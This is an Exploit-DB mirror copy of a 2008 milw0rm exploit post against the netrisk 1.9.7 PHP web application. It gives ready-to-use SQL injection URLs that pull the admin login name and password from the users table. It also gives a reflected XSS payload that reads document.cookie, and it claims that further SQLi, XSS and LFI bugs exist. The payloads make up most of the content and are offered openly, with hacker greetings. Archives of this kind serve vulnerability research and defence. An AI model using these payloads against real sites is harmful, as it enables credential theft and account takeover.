exploit-db-mirror/exploits/php/webapps/4852.txt
Offensive Security b4c96a5864 DB: 2021-09-03
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

38 lines
No EOL
1.2 KiB
Text

####################################################################
# #
# ...:::::netrisk 1.9.7 Multiple Remote Vulnerabilities::::.... #
# (sql injection/xss) #
####################################################################
Virangar Security Team
www.virangar.org
www.virangar.net
--------
Discoverd By : virangar security team
(hadihadi)
---------------------------------
special tnx to:MR.nosrati,black.shadowes,MR.hesy,satan,Zahra
& all virangar members & all hackerz
greetz:to my best friend in the world hadi_aryaie2004
------------------------------------
vlues:
1.sql injection:
get admin login name:
http://site.com/patch/index.php?page=profile&pid=-1/**/union/**/select/**/1,2,login,4,5,6,7,8,9,10,11/**/from/**/users/**/where/**/id=1/*
---
get admin pass:
http://site.com/patch/index.php?page=profile&pid=-1/**/union/**/select/**/1,2,pass,4,5,6,7,8,9,10,11/**/from/**/users/**/where/**/id=1/*
########################
2.xss:
http://site.com/patch/index.php?page=<script>alert(document.cookie)</script>
########################
NetRisk contains of other sql injecton/xss/LFI bugs in other pages ;)
# milw0rm.com [2008-01-06]